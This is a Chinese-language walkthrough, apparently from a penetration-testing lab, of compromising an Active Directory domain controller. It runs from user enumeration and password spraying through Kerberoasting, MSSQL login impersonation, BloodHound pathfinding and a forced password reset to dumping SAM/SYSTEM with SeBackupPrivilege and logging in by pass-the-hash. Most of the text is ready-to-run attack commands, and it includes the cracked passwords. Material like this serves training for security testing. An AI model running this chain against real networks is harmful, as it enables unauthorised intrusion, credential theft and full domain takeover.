偵查

掃描全埠並確認開啟服務：
53,80,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,8530,8531,9389,47001,...

主要目標為 SMB、LDAP、Kerberos、MSSQL、RDP。

帳號列舉與密碼猜測

使用 kerbrute 列出使用者。

kerbrute userenum -d hokkaido-aerospace.com --dc 192.168.208.40 \
  /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt -t 100

找出使用者：info, administrator, discovery, maintenance。

建立小字典後用 crackmapexec 嘗試 SMB 單帳密爆破：

crackmapexec smb 192.168.208.40 -u users.txt -p pass.txt --continue-on-success

命中 info:info。用該帳密列舉 share：

crackmapexec smb 192.168.208.40 -u info -p info --shares

在 NETLOGON 的 temp 目錄找到 password_reset.txt，內容包含 Initial Password: Start123!。用此密碼再跑一次爆破找到 discovery:Start123!。

Kerberoast 與 TGS

有可用帳密後執行 Kerberoast 以收集 SPN：

impacket-GetUserSPNs -dc-ip 192.168.208.40 hokkaido-aerospace.com/discovery:Start123! -request

發現 discovery 與 maintenance 為可 Kerberoast 對象。maintenance 的 hash 未能破解，先轉向 MSSQL。

MSSQL 濫用與權限提升入口

用 discovery 憑證連到 MSSQL：

impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.208.40 -windows-auth

查詢資料庫發現 hrappdb，但直接切換被拒。查詢可 impersonate 的登入發現 hrappdb-reader：

SELECT distinct b.name FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

以 EXECUTE AS LOGIN = 'hrappdb-reader' 切換後成功切換到 hrappdb，並查到表 sysauth 內有 hrapp-service:Untimed$Runny。

使用應用帳號與 BloodHound 路徑發掘

用 hrapp-service 執行資料收集並上傳 BloodHound：

bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d hokkaido-aerospace.com -c all --zip -ns 192.168.208.40

BloodHound 顯示 hrapp-service 對 Hazel.Green 有 GenericWrite 權限，而 Hazel.Green 屬於 IT 群組，能進一步影響更高權限帳號（例如 tier1/tier2）。

針對 Hazel.Green 做 targeted Kerberoast 並破解得到密碼 haze1988：

targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40

橫向操作：重設高階管理員密碼

利用 Hazel.Green 的權限遠端改變 MOLLY.SMITH 密碼：

rpcclient -N 192.168.208.40 -U 'hazel.green%haze1988'
# rpcclient> setuserinfo2 MOLLY.SMITH 23 'Password123!'

成功後用 RDP 或 xfreerdp 登入 MOLLY.SMITH：

xfreerdp /u:molly.smith /p:'Password123!' /v:192.168.208.40 +clipboard

取得系統權限（Privilege Escalation 到 Administrator / SYSTEM）

在 MOLLY.SMITH session 中檢查權限：

whoami /priv

發現有 SeBackupPrivilege。利用此權限導出本機 SAM 與 SYSTEM：

reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

將檔案下載回攻擊機器後使用 impacket 解析取得 Administrator hash：

impacket-secretsdump -system system -sam sam local

或直接使用 hash 做免密登入：

evil-winrm -i <ip> -u administrator -H "<hash>"